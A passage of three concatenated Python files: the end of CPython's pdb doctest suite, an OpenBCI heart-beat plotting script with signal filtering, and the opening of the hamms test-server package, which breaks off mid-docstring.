    2   breakpoint   keep yes   at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
    3   breakpoint   keep yes   at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
    (Pdb) clear 3
    Deleted breakpoint 3 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
    (Pdb) break
    Num Type         Disp Enb   Where
    1   breakpoint   keep no    at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
            stop only if 1 < 2
            ignore next 10 hits
    2   breakpoint   keep yes   at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
    (Pdb) condition 1
    Breakpoint 1 is now unconditional.
    (Pdb) enable 1
    Enabled breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
    (Pdb) clear 1
    Deleted breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
    (Pdb) commands 2
    (com) p "42"
    (com) print("42", 7*6)
    (com) end
    (Pdb) continue
    1
    '42'
    42 42
    > <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(4)test_function()
    -> print(2)
    (Pdb) clear
    Clear all breaks? y
    Deleted breakpoint 2 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
    (Pdb) tbreak 5
    Breakpoint 4 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:5
    (Pdb) continue
    2
    Deleted breakpoint 4 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:5
    > <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(5)test_function()
    -> print(3)
    (Pdb) break
    (Pdb) continue
    3
    4
    """
# NOTE: keep this body exactly as-is (no docstring/comments inside):
# test_list_commands asserts pdb's `longlist` output for it verbatim.
def do_nothing():
    pass
# NOTE: keep this body exactly as-is (no docstring/comments inside):
# test_list_commands asserts pdb's `source do_something` output verbatim.
def do_something():
    print(42)
# NOTE: the docstring below IS the test (run by doctest); edit with care.
def test_list_commands():
    """Test the list and source commands of pdb.

    >>> def test_function_2(foo):
    ...     import test.test_pdb
    ...     test.test_pdb.do_nothing()
    ...     'some...'
    ...     'more...'
    ...     'code...'
    ...     'to...'
    ...     'make...'
    ...     'a...'
    ...     'long...'
    ...     'listing...'
    ...     'useful...'
    ...     '...'
    ...     '...'
    ...     return foo

    >>> def test_function():
    ...     import pdb; pdb.Pdb(nosigint=True).set_trace()
    ...     ret = test_function_2('baz')

    >>> with PdbTestInput([  # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
    ...     'list',      # list first function
    ...     'step',      # step into second function
    ...     'list',      # list second function
    ...     'list',      # continue listing to EOF
    ...     'list 1,3',  # list specific lines
    ...     'list x',    # invalid argument
    ...     'next',      # step to import
    ...     'next',      # step over import
    ...     'step',      # step into do_nothing
    ...     'longlist',  # list all lines
    ...     'source do_something',  # list all lines of function
    ...     'source fooxxx',        # something that doesn't exit
    ...     'continue',
    ... ]):
    ...     test_function()
    > <doctest test.test_pdb.test_list_commands[1]>(3)test_function()
    -> ret = test_function_2('baz')
    (Pdb) list
      1         def test_function():
      2             import pdb; pdb.Pdb(nosigint=True).set_trace()
      3  ->         ret = test_function_2('baz')
    [EOF]
    (Pdb) step
    --Call--
    > <doctest test.test_pdb.test_list_commands[0]>(1)test_function_2()
    -> def test_function_2(foo):
    (Pdb) list
      1  ->     def test_function_2(foo):
      2             import test.test_pdb
      3             test.test_pdb.do_nothing()
      4             'some...'
      5             'more...'
      6             'code...'
      7             'to...'
      8             'make...'
      9             'a...'
     10             'long...'
     11             'listing...'
    (Pdb) list
     12             'useful...'
     13             '...'
     14             '...'
     15             return foo
    [EOF]
    (Pdb) list 1,3
      1  ->     def test_function_2(foo):
      2             import test.test_pdb
      3             test.test_pdb.do_nothing()
    (Pdb) list x
    *** ...
    (Pdb) next
    > <doctest test.test_pdb.test_list_commands[0]>(2)test_function_2()
    -> import test.test_pdb
    (Pdb) next
    > <doctest test.test_pdb.test_list_commands[0]>(3)test_function_2()
    -> test.test_pdb.do_nothing()
    (Pdb) step
    --Call--
    > ...test_pdb.py(...)do_nothing()
    -> def do_nothing():
    (Pdb) longlist
    ...  ->     def do_nothing():
    ...             pass
    (Pdb) source do_something
    ...         def do_something():
    ...             print(42)
    (Pdb) source fooxxx
    *** ...
    (Pdb) continue
    """
# NOTE: the docstring below IS the test (run by doctest); edit with care.
def test_post_mortem():
    """Test post mortem traceback debugging.

    >>> def test_function_2():
    ...     try:
    ...         1/0
    ...     finally:
    ...         print('Exception!')

    >>> def test_function():
    ...     import pdb; pdb.Pdb(nosigint=True).set_trace()
    ...     test_function_2()
    ...     print('Not reached.')

    >>> with PdbTestInput([  # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
    ...     'next',      # step over exception-raising call
    ...     'bt',        # get a backtrace
    ...     'list',      # list code of test_function()
    ...     'down',      # step into test_function_2()
    ...     'list',      # list code of test_function_2()
    ...     'continue',
    ... ]):
    ...     try:
    ...         test_function()
    ...     except ZeroDivisionError:
    ...         print('Correctly reraised.')
    > <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
    -> test_function_2()
    (Pdb) next
    Exception!
    ZeroDivisionError: division by zero
    > <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
    -> test_function_2()
    (Pdb) bt
    ...
      <doctest test.test_pdb.test_post_mortem[2]>(10)<module>()
    -> test_function()
    > <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
    -> test_function_2()
      <doctest test.test_pdb.test_post_mortem[0]>(3)test_function_2()
    -> 1/0
    (Pdb) list
      1         def test_function():
      2             import pdb; pdb.Pdb(nosigint=True).set_trace()
      3  ->         test_function_2()
      4             print('Not reached.')
    [EOF]
    (Pdb) down
    > <doctest test.test_pdb.test_post_mortem[0]>(3)test_function_2()
    -> 1/0
    (Pdb) list
      1         def test_function_2():
      2             try:
      3  >>            1/0
      4             finally:
      5  ->            print('Exception!')
    [EOF]
    (Pdb) continue
    Correctly reraised.
    """
# NOTE: the docstring below IS the test (run by doctest); edit with care.
def test_pdb_skip_modules():
    """This illustrates the simple case of module skipping.

    >>> def skip_module():
    ...     import string
    ...     import pdb; pdb.Pdb(skip=['stri*'], nosigint=True).set_trace()
    ...     string.capwords('FOO')

    >>> with PdbTestInput([
    ...     'step',
    ...     'continue',
    ... ]):
    ...     skip_module()
    > <doctest test.test_pdb.test_pdb_skip_modules[0]>(4)skip_module()
    -> string.capwords('FOO')
    (Pdb) step
    --Return--
    > <doctest test.test_pdb.test_pdb_skip_modules[0]>(4)skip_module()->None
    -> string.capwords('FOO')
    (Pdb) continue
    """
# Module for testing skipping of module that makes a callback
# (test_pdb_skip_modules_with_callback below steps over frames of this module).
mod = types.ModuleType('module_to_skip')
exec('def foo_pony(callback): x = 1; callback(); return None', mod.__dict__)
# NOTE: the docstring below IS the test (run by doctest); edit with care.
def test_pdb_skip_modules_with_callback():
    """This illustrates skipping of modules that call into other code.

    >>> def skip_module():
    ...     def callback():
    ...         return None
    ...     import pdb; pdb.Pdb(skip=['module_to_skip*'], nosigint=True).set_trace()
    ...     mod.foo_pony(callback)

    >>> with PdbTestInput([
    ...     'step',
    ...     'step',
    ...     'step',
    ...     'step',
    ...     'step',
    ...     'continue',
    ... ]):
    ...     skip_module()
    ...     pass # provides something to "step" to
    > <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(5)skip_module()
    -> mod.foo_pony(callback)
    (Pdb) step
    --Call--
    > <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(2)callback()
    -> def callback():
    (Pdb) step
    > <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(3)callback()
    -> return None
    (Pdb) step
    --Return--
    > <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(3)callback()->None
    -> return None
    (Pdb) step
    --Return--
    > <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(5)skip_module()->None
    -> mod.foo_pony(callback)
    (Pdb) step
    > <doctest test.test_pdb.test_pdb_skip_modules_with_callback[1]>(10)<module>()
    -> pass # provides something to "step" to
    (Pdb) continue
    """
# NOTE: the docstring below IS the test (run by doctest); edit with care.
def test_pdb_continue_in_bottomframe():
    """Test that "continue" and "next" work properly in bottom frame (issue #5294).

    >>> def test_function():
    ...     import pdb, sys; inst = pdb.Pdb(nosigint=True)
    ...     inst.set_trace()
    ...     inst.botframe = sys._getframe() # hackery to get the right botframe
    ...     print(1)
    ...     print(2)
    ...     print(3)
    ...     print(4)

    >>> with PdbTestInput([  # doctest: +ELLIPSIS
    ...     'next',
    ...     'break 7',
    ...     'continue',
    ...     'next',
    ...     'continue',
    ...     'continue',
    ... ]):
    ...     test_function()
    > <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(4)test_function()
    -> inst.botframe = sys._getframe() # hackery to get the right botframe
    (Pdb) next
    > <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(5)test_function()
    -> print(1)
    (Pdb) break 7
    Breakpoint ... at <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>:7
    (Pdb) continue
    1
    2
    > <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(7)test_function()
    -> print(3)
    (Pdb) next
    3
    > <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(8)test_function()
    -> print(4)
    (Pdb) continue
    4
    """
def pdb_invoke(method, arg):
    """Run pdb.method(arg)."""
    import pdb
    debugger = pdb.Pdb(nosigint=True)
    entry_point = getattr(debugger, method)
    entry_point(arg)
# NOTE: the docstring below IS the test (run by doctest); edit with care.
def test_pdb_run_with_incorrect_argument():
    """Testing run and runeval with incorrect first argument.

    >>> pti = PdbTestInput(['continue',])
    >>> with pti:
    ...     pdb_invoke('run', lambda x: x)
    Traceback (most recent call last):
    TypeError: exec() arg 1 must be a string, bytes or code object

    >>> with pti:
    ...     pdb_invoke('runeval', lambda x: x)
    Traceback (most recent call last):
    TypeError: eval() arg 1 must be a string, bytes or code object
    """
# NOTE: the docstring below IS the test (run by doctest); edit with care.
def test_pdb_run_with_code_object():
    """Testing run and runeval with code object as a first argument.

    >>> with PdbTestInput(['step','x', 'continue']):  # doctest: +ELLIPSIS
    ...     pdb_invoke('run', compile('x=1', '<string>', 'exec'))
    > <string>(1)<module>()...
    (Pdb) step
    --Return--
    > <string>(1)<module>()->None
    (Pdb) x
    1
    (Pdb) continue

    >>> with PdbTestInput(['x', 'continue']):
    ...     x=0
    ...     pdb_invoke('runeval', compile('x+1', '<string>', 'eval'))
    > <string>(1)<module>()->None
    (Pdb) x
    1
    (Pdb) continue
    """
# NOTE: the docstring below IS the test (run by doctest); edit with care.
def test_next_until_return_at_return_event():
    """Test that pdb stops after a next/until/return issued at a return debug event.

    >>> def test_function_2():
    ...     x = 1
    ...     x = 2

    >>> def test_function():
    ...     import pdb; pdb.Pdb(nosigint=True).set_trace()
    ...     test_function_2()
    ...     test_function_2()
    ...     test_function_2()
    ...     end = 1

    >>> from bdb import Breakpoint
    >>> Breakpoint.next = 1

    >>> with PdbTestInput(['break test_function_2',
    ...                    'continue',
    ...                    'return',
    ...                    'next',
    ...                    'continue',
    ...                    'return',
    ...                    'until',
    ...                    'continue',
    ...                    'return',
    ...                    'return',
    ...                    'continue']):
    ...     test_function()
    > <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(3)test_function()
    -> test_function_2()
    (Pdb) break test_function_2
    Breakpoint 1 at <doctest test.test_pdb.test_next_until_return_at_return_event[0]>:1
    (Pdb) continue
    > <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
    -> x = 1
    (Pdb) return
    --Return--
    > <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
    -> x = 2
    (Pdb) next
    > <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(4)test_function()
    -> test_function_2()
    (Pdb) continue
    > <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
    -> x = 1
    (Pdb) return
    --Return--
    > <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
    -> x = 2
    (Pdb) until
    > <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(5)test_function()
    -> test_function_2()
    (Pdb) continue
    > <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
    -> x = 1
    (Pdb) return
    --Return--
    > <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
    -> x = 2
    (Pdb) return
    > <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(6)test_function()
    -> end = 1
    (Pdb) continue
    """
# NOTE: the docstring below IS the test (run by doctest); edit with care.
def test_pdb_next_command_for_generator():
    """Testing skip unwindng stack on yield for generators for "next" command

    >>> def test_gen():
    ...     yield 0
    ...     return 1
    ...     yield 2

    >>> def test_function():
    ...     import pdb; pdb.Pdb(nosigint=True).set_trace()
    ...     it = test_gen()
    ...     try:
    ...         assert next(it) == 0
    ...         next(it)
    ...     except StopIteration as ex:
    ...         assert ex.value == 1
    ...     print("finished")

    >>> with PdbTestInput(['step',
    ...                    'step',
    ...                    'step',
    ...                    'next',
    ...                    'next',
    ...                    'step',
    ...                    'step',
    ...                    'continue']):
    ...     test_function()
    > <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(3)test_function()
    -> it = test_gen()
    (Pdb) step
    > <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(4)test_function()
    -> try:
    (Pdb) step
    > <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(5)test_function()
    -> assert next(it) == 0
    (Pdb) step
    --Call--
    > <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(1)test_gen()
    -> def test_gen():
    (Pdb) next
    > <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(2)test_gen()
    -> yield 0
    (Pdb) next
    > <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(3)test_gen()
    -> return 1
    (Pdb) step
    --Return--
    > <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(3)test_gen()->1
    -> return 1
    (Pdb) step
    StopIteration: 1
    > <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(6)test_function()
    -> next(it)
    (Pdb) continue
    finished
    """
# NOTE: the docstring below IS the test (run by doctest); edit with care.
def test_pdb_return_command_for_generator():
    """Testing no unwindng stack on yield for generators
       for "return" command

    >>> def test_gen():
    ...     yield 0
    ...     return 1
    ...     yield 2

    >>> def test_function():
    ...     import pdb; pdb.Pdb(nosigint=True).set_trace()
    ...     it = test_gen()
    ...     try:
    ...         assert next(it) == 0
    ...         next(it)
    ...     except StopIteration as ex:
    ...         assert ex.value == 1
    ...     print("finished")

    >>> with PdbTestInput(['step',
    ...                    'step',
    ...                    'step',
    ...                    'return',
    ...                    'step',
    ...                    'step',
    ...                    'continue']):
    ...     test_function()
    > <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(3)test_function()
    -> it = test_gen()
    (Pdb) step
    > <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(4)test_function()
    -> try:
    (Pdb) step
    > <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(5)test_function()
    -> assert next(it) == 0
    (Pdb) step
    --Call--
    > <doctest test.test_pdb.test_pdb_return_command_for_generator[0]>(1)test_gen()
    -> def test_gen():
    (Pdb) return
    StopIteration: 1
    > <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(6)test_function()
    -> next(it)
    (Pdb) step
    > <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(7)test_function()
    -> except StopIteration as ex:
    (Pdb) step
    > <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(8)test_function()
    -> assert ex.value == 1
    (Pdb) continue
    finished
    """
# NOTE: the docstring below IS the test (run by doctest); edit with care.
def test_pdb_until_command_for_generator():
    """Testing no unwindng stack on yield for generators
       for "until" command if target breakpoing is not reached

    >>> def test_gen():
    ...     yield 0
    ...     yield 1
    ...     yield 2

    >>> def test_function():
    ...     import pdb; pdb.Pdb(nosigint=True).set_trace()
    ...     for i in test_gen():
    ...         print(i)
    ...     print("finished")

    >>> with PdbTestInput(['step',
    ...                    'until 4',
    ...                    'step',
    ...                    'step',
    ...                    'continue']):
    ...     test_function()
    > <doctest test.test_pdb.test_pdb_until_command_for_generator[1]>(3)test_function()
    -> for i in test_gen():
    (Pdb) step
    --Call--
    > <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(1)test_gen()
    -> def test_gen():
    (Pdb) until 4
    0
    1
    > <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(4)test_gen()
    -> yield 2
    (Pdb) step
    --Return--
    > <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(4)test_gen()->2
    -> yield 2
    (Pdb) step
    > <doctest test.test_pdb.test_pdb_until_command_for_generator[1]>(4)test_function()
    -> print(i)
    (Pdb) continue
    2
    finished
    """
# NOTE: the docstring below IS the test (run by doctest); edit with care.
def test_pdb_next_command_in_generator_for_loop():
    """The next command on returning from a generator controled by a for loop.

    >>> def test_gen():
    ...     yield 0
    ...     return 1

    >>> def test_function():
    ...     import pdb; pdb.Pdb(nosigint=True).set_trace()
    ...     for i in test_gen():
    ...         print('value', i)
    ...     x = 123

    >>> with PdbTestInput(['break test_gen',
    ...                    'continue',
    ...                    'next',
    ...                    'next',
    ...                    'next',
    ...                    'continue']):
    ...     test_function()
    > <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(3)test_function()
    -> for i in test_gen():
    (Pdb) break test_gen
    Breakpoint 6 at <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>:1
    (Pdb) continue
    > <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>(2)test_gen()
    -> yield 0
    (Pdb) next
    value 0
    > <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>(3)test_gen()
    -> return 1
    (Pdb) next
    Internal StopIteration: 1
    > <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(3)test_function()
    -> for i in test_gen():
    (Pdb) next
    > <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(5)test_function()
    -> x = 123
    (Pdb) continue
    """
# NOTE: the docstring below IS the test (run by doctest); edit with care.
def test_pdb_next_command_subiterator():
    """The next command in a generator with a subiterator.

    >>> def test_subgenerator():
    ...     yield 0
    ...     return 1

    >>> def test_gen():
    ...     x = yield from test_subgenerator()
    ...     return x

    >>> def test_function():
    ...     import pdb; pdb.Pdb(nosigint=True).set_trace()
    ...     for i in test_gen():
    ...         print('value', i)
    ...     x = 123

    >>> with PdbTestInput(['step',
    ...                    'step',
    ...                    'next',
    ...                    'next',
    ...                    'next',
    ...                    'continue']):
    ...     test_function()
    > <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(3)test_function()
    -> for i in test_gen():
    (Pdb) step
    --Call--
    > <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(1)test_gen()
    -> def test_gen():
    (Pdb) step
    > <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(2)test_gen()
    -> x = yield from test_subgenerator()
    (Pdb) next
    value 0
    > <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(3)test_gen()
    -> return x
    (Pdb) next
    Internal StopIteration: 1
    > <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(3)test_function()
    -> for i in test_gen():
    (Pdb) next
    > <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(5)test_function()
    -> x = 123
    (Pdb) continue
    """
class PdbTestCase(unittest.TestCase):
    """End-to-end tests that drive pdb in a subprocess."""

    def run_pdb(self, script, commands):
        """Run 'script' lines with pdb and the pdb 'commands'."""
        filename = 'main.py'
        with open(filename, 'w') as f:
            f.write(textwrap.dedent(script))
        self.addCleanup(support.unlink, filename)
        self.addCleanup(support.rmtree, '__pycache__')
        cmd = [sys.executable, '-m', 'pdb', filename]
        stdout = stderr = None
        with subprocess.Popen(cmd, stdout=subprocess.PIPE,
                              stdin=subprocess.PIPE,
                              stderr=subprocess.STDOUT,
                              ) as proc:
            stdout, stderr = proc.communicate(str.encode(commands))
            # communicate() may return None; decode only real output.
            stdout = stdout and bytes.decode(stdout)
            stderr = stderr and bytes.decode(stderr)
        return stdout, stderr

    def _assert_find_function(self, file_content, func_name, expected):
        # Write file_content to TESTFN and check pdb.find_function's result
        # against (name, TESTFN, lineno), or None when not expected to match.
        file_content = textwrap.dedent(file_content)
        with open(support.TESTFN, 'w') as f:
            f.write(file_content)
        expected = None if not expected else (
            expected[0], support.TESTFN, expected[1])
        self.assertEqual(
            expected, pdb.find_function(func_name, support.TESTFN))

    def test_find_function_empty_file(self):
        self._assert_find_function('', 'foo', None)

    def test_find_function_found(self):
        # NOTE: 'bar' must be on line 4 of the dedented source below.
        self._assert_find_function(
            """\
            def foo():
                pass

            def bar():
                pass

            def quux():
                pass
            """,
            'bar',
            ('bar', 4),
        )

    def test_issue7964(self):
        # open the file as binary so we can force \r\n newline
        with open(support.TESTFN, 'wb') as f:
            f.write(b'print("testing my pdb")\r\n')
        cmd = [sys.executable, '-m', 'pdb', support.TESTFN]
        proc = subprocess.Popen(cmd,
                                stdout=subprocess.PIPE,
                                stdin=subprocess.PIPE,
                                stderr=subprocess.STDOUT,
                                )
        self.addCleanup(proc.stdout.close)
        stdout, stderr = proc.communicate(b'quit\n')
        self.assertNotIn(b'SyntaxError', stdout,
                         "Got a syntax error running test script under PDB")

    def test_issue13183(self):
        # NOTE: the blank lines in `script` matter -- the assertion below
        # expects foo's return on line 5 of the dedented file.
        script = """
            from bar import bar

            def foo():
                bar()

            def nope():
                pass

            def foobar():
                foo()
                nope()

            foobar()
        """
        commands = """
            from bar import bar
            break bar
            continue
            step
            step
            quit
        """
        bar = """
            def bar():
                pass
        """
        with open('bar.py', 'w') as f:
            f.write(textwrap.dedent(bar))
        self.addCleanup(support.unlink, 'bar.py')
        stdout, stderr = self.run_pdb(script, commands)
        self.assertTrue(
            any('main.py(5)foo()->None' in l for l in stdout.splitlines()),
            'Fail to step into the caller after a return')

    def test_issue13210(self):
        # invoking "continue" on a non-main thread triggered an exception
        # inside signal.signal

        # raises SkipTest if python was built without threads
        support.import_module('threading')

        with open(support.TESTFN, 'wb') as f:
            f.write(textwrap.dedent("""
                import threading
                import pdb

                def start_pdb():
                    pdb.Pdb().set_trace()
                    x = 1
                    y = 1

                t = threading.Thread(target=start_pdb)
                t.start()""").encode('ascii'))
        cmd = [sys.executable, '-u', support.TESTFN]
        proc = subprocess.Popen(cmd,
                                stdout=subprocess.PIPE,
                                stdin=subprocess.PIPE,
                                stderr=subprocess.STDOUT,
                                )
        self.addCleanup(proc.stdout.close)
        stdout, stderr = proc.communicate(b'cont\n')
        self.assertNotIn('Error', stdout.decode(),
                         "Got an error running test script under PDB")

    def tearDown(self):
        # Best-effort removal of the scratch file used by several tests.
        support.unlink(support.TESTFN)
def load_tests(*args):
    """Collect both the unittest cases and this module's doctests."""
    from test import test_pdb
    return unittest.TestSuite([
        unittest.makeSuite(PdbTestCase),
        doctest.DocTestSuite(test_pdb),
    ])
# Allow running this test file directly (load_tests picks up the doctests).
if __name__ == '__main__':
    unittest.main()
|
heart_beat.py | import sys
sys.path.append('C:/Python37/Lib/site-packages')
from pyqtgraph.Qt import QtGui, QtCore
import pyqtgraph as pg
import random
from pyOpenBCI import OpenBCICyton
import threading
import time
import numpy as np
from scipy import signal
import random
import numpy as np
from PIL import Image
# Heart images: heart_1 shown at rest, heart_2 flashed when a beat is detected.
img = Image.open('heart_1.png').convert('RGBA')
arr = np.array(img)
img2 = Image.open('heart_2.png').convert('RGBA')
arr2 = np.array(img2)

# Converts raw 24-bit ADC counts to microvolts.
SCALE_FACTOR = (4500000)/24/(2**23-1)  # From the pyOpenBCI repo
colors = 'rgbycmwr'  # pen colours, one per channel

# Build the pyqtgraph window: time series, FFT, beat flag, and heart image.
app = QtGui.QApplication([])
win = pg.GraphicsWindow(title='Python OpenBCI GUI')
# title_graph = win.addPlot(row=0, col=0, colspan=4,title='Python OpenBCI GUI')
ts_plots = win.addPlot(row=0, col=0, colspan=4, title='Channel %d' % 1, labels={'left': 'uV'})
fft_plot = win.addPlot(row=2, col=0, rowspan=2, colspan=2, title='Filtered Plot', labels={'left': 'uV', 'bottom': 'Hz'})
fft_plot.setLimits(xMin=1, xMax=125, yMin=0, yMax=1e7)
ss_plot = win.addPlot(row=4, col=0, rowspan=2, colspan=2, title='signal', labels={'left': 'Is beat'})
heart_im = win.addViewBox(lockAspect=True)
imv = pg.ImageItem()
heart_im.addItem(imv)
imv.setImage(arr)

# Shared sample buffer: appended to by the board thread, read by updater().
data = [0]
# Cap on retained samples: updater() only ever reads the trailing
# fs*disp_sec + 100 = 850 samples, so 5000 leaves ample slack.
_MAX_SAMPLES = 5000


def save_data(sample):
    """OpenBCI stream callback: append channel 0 (scaled to uV) to `data`.

    Also trims `data` so it cannot grow without bound during a long
    session (the previous version kept every sample forever, a leak).
    """
    global data
    data.append(sample.channels_data[0]*SCALE_FACTOR)
    # Drop history the plots can never show.
    if len(data) > _MAX_SAMPLES:
        del data[:-_MAX_SAMPLES]
def updater():
    """Timer callback: filter the latest samples and refresh all plots.

    Reads the shared `data` buffer, applies 60/50 Hz notch filters and a
    2-50 Hz bandpass, then updates the time-series, FFT and beat plots,
    swapping the heart image when a beat is detected in the last 100
    samples. (Removed: unused `one_beat`/`filt` dead code and the
    undefined `plots` name from the global statement.)
    """
    global data
    fs = 250       # sample rate, Hz
    disp_sec = 3   # seconds of signal to display
    # Trailing window plus 100 extra samples to absorb filter edge effects.
    t_data = np.array(data[-(fs*disp_sec + 100):]).T  # transpose data

    # Notch (band-stop) filter centred on `val` Hz, +/- 3 Hz wide.
    # `order` was previously named `b`, which the loop body shadowed with
    # the filter's numerator coefficients.
    def notch_filter(val, data, fs=250, order=5):
        notch_freq_Hz = np.array([float(val)])
        for freq_Hz in np.nditer(notch_freq_Hz):
            bp_stop_Hz = freq_Hz + 3.0 * np.array([-1, 1])
            b, a = signal.butter(order, bp_stop_Hz / (fs / 2.0), 'bandstop')
            fin = data = signal.lfilter(b, a, data)
        return fin

    # First-order Butterworth band-pass between `start` and `stop` Hz.
    def bandpass(start, stop, data, fs=250):
        bp_Hz = np.array([start, stop])
        b, a = signal.butter(1, bp_Hz / (fs / 2.0), btype='bandpass')
        return signal.lfilter(b, a, data, axis=0)

    # Remove mains interference (both 60 Hz and 50 Hz), then band-limit.
    nf_data = np.array(notch_filter(60, t_data, order=10))
    nf_data = np.array(notch_filter(50, nf_data, order=10))
    bp_nf_data = np.array(bandpass(2, 50, nf_data))

    ts_plots.clear()
    ts_plots.plot(pen='r').setData(bp_nf_data[100:])

    # FFT of the filtered window.
    fft_plot.clear()
    sp = np.absolute(np.fft.fft(bp_nf_data))
    freq = np.fft.fftfreq(bp_nf_data.shape[-1], 1.0/fs)
    fft_plot.plot(pen='y').setData(freq, sp)

    # Beat detection: flag samples more than one stddev above the mean.
    ss_plot.clear()
    new_arr = bp_nf_data > np.average(bp_nf_data) + np.std(bp_nf_data)
    ss_plot.plot(pen='g').setData(new_arr[100:]*1)

    # Show the "beating" heart image if any recent sample is flagged.
    if sum(new_arr[-100:]*1):
        imv.setImage(arr2)
    else:
        imv.setImage(arr)
def start_board():
    """Open the Cyton board on COM5 and stream samples into save_data."""
    cyton = OpenBCICyton(port='COM5', daisy=False)
    cyton.start_stream(save_data)
if __name__ == '__main__':
    # Standard pyqtgraph guard: only start the event loop when run as a
    # script (not inside an interactive session that already drives Qt).
    if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
        # Board streaming runs on a daemon thread so the GUI stays responsive.
        x = threading.Thread(target=start_board)
        x.daemon = True
        x.start()
        # 0 ms interval: re-plot as fast as the Qt event loop allows.
        timer = QtCore.QTimer()
        timer.timeout.connect(updater)
        timer.start(0)
        QtGui.QApplication.instance().exec_()
|
__init__.py | from email import message_from_string
import json
import logging
import random
from StringIO import StringIO
from threading import Thread
import time
import urlparse
from flask import Flask, request, Response, g
from httpbin.helpers import get_dict, status_code
from twisted.internet import protocol, reactor
from twisted.web.server import Site
from twisted.web.wsgi import WSGIResource
from werkzeug.routing import Rule
from werkzeug.http import parse_accept_header
from .morse import morsedict
# Package-wide logger for access-log style lines.
logger = logging.getLogger("hamms")
logger.setLevel(logging.INFO)
# XXX: also update version in setup.py
__version__ = '1.3'
# Advertised in the Server header of every HTTP response hamms emits.
SERVER_HEADER = 'Hamms/{version}'.format(version=__version__)
# Each misbehaving server listens on base_port + its class-level PORT offset.
BASE_PORT = 5500
class HammsSite(Site):
    """Twisted Site that stamps the Hamms Server header on every response."""

    def getResourceFor(self, request):
        # Set the header before delegating resource lookup to the base Site.
        request.setHeader('Server', SERVER_HEADER)
        return Site.getResourceFor(self, request)
class HammsServer(object):
    """ Start the hamms server in a thread.

    Usage::

        hs = HammsServer()
        hs.start(beginning_port=5500)
        # When you are done working with hamms
        hs.stop()

    :param int beginning_port: Hamms will start servers on all ports from
        beginning_port to beginning_port + 14.
    """

    def start(self, beginning_port=BASE_PORT):
        # Bind all the misbehaving servers, then run the (global, singleton)
        # twisted reactor on a daemon thread if it is not already running.
        self.beginning_port = beginning_port
        self.retry_cache = {}
        listen(reactor, base_port=self.beginning_port, retry_cache=self.retry_cache)
        if not reactor.running:
            # installSignalHandlers=False: we are not on the main thread.
            self.t = Thread(target=reactor.run, args=(False,))
            self.t.daemon = True
            self.t.start()

    def stop(self):
        # NOTE: a stopped twisted reactor cannot be restarted in-process.
        reactor.stop()
def listen(_reactor, base_port=BASE_PORT, retry_cache=None):
    """Bind every misbehaving server to base_port + its PORT offset.

    Raw-socket failure modes are twisted Protocol factories; HTTP-level
